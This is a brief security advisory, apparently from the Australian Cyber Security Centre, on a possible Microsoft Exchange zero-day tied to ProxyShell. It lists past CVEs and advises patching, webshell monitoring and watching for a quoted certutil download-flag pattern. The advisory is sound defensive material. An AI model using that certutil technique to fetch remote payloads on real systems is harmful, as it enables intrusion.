Background / What has happened?
The Australian Cyber Security Centre (ACSC) is aware of a potential vulnerability associated with Microsoft Exchange Server (Exchange).
The ACSC is not aware of successful exploitation within Australia.
Unpatched versions of ProxyShell are reportedly impacted by the potential zero day vulnerability.
There is no associated CVE at this time.
Historical CVE's related to ProxyShell:
- CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (Patched in April by KB5001779)
- CVE-2021-34523 - Elevation of Privilege on Exchange PowerShell Backend (Patched in April by KB5001779)
- CVE-2021-31207 - Post-auth Arbitrary-File-Write leads to RCE (Patched in May by KB5003435)
Mitigation / How do I stay secure?
Apply latest patches from Microsoft and monitor network for suspicious activity.
Monitor exchange servers for webshells.
Monitor for suspicious use of certutil (eg. certutil.exe -urlcache -split -f).
Microsoft has been notified and the ACSC will provide updates as they become available.
Assistance / Where can I go for help?
The ACSC is monitoring the situation and is able to provide assistance and advice as required. Organisations or individuals that have been impacted or require assistance can contact the ACSC via cyber.gov.au/report, or 1300 CYBER1.
